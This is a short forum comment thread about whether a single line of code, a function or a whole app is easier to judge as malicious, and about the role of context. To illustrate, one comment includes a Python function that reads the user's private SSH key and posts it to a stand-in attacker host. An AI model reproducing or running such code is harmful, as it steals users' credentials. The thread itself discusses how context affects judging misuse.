It is easier to judge whether a function is malicious than a single line of code, a file than a function, a repo than a file, or an app than a repo.
This paragraph does not make sense to me. (Maybe my reading comprehension is not up to the task).
Is the thesis that the same line of code may be malicious or not, depending on its context?
I would say that it is easier to judge the maliciousness of a single line of code than of the whole function, simply because the analysis of the whole function requires far more resources. You can rule out certain classes of threats by inspecting that one line, while remaining ignorant about a much larger set of threat classes that require broader context. If your threat model requires you to decide about those other classes of threats, you must expend those additional resources. It is not about something being easier; it's about being able to make the judgement at all.
[EDIT] Or rephrasing: you need to see a certain breadth of context before you can judge whether a system is misused according to some definition of misuse. You can make do with a narrow context for certain narrow definitions of misuse; but the wider your definition of misuse, the wider the context you have to analyze before you can decide.
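To make the context point concrete, here is a minimal hypothetical sketch (the function name, path, and URL are all made up, not taken from anywhere): each line, inspected on its own, looks routine and only rules out a narrow class of threats; the misuse only becomes apparent once you see the whole function.

```python
import pathlib
import urllib.request


def sync_settings() -> None:
    # Line-level view: reading a file is routine; posting some bytes is routine.
    # Function-level view: together these lines exfiltrate a private SSH key.
    payload = pathlib.Path.home().joinpath(".ssh", "id_rsa").read_bytes()
    urllib.request.urlopen("https://attacker.example/upload", data=payload)
```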
I should clarify that section. I meant that if you're asked to write a line of code or an app or whatever, then it is easier to guess at intent/consequences for the higher-level tasks. Another example: the lab manager has a better idea of what's going on than a lab assistant.
Ah, ok. Thank you for clarifying.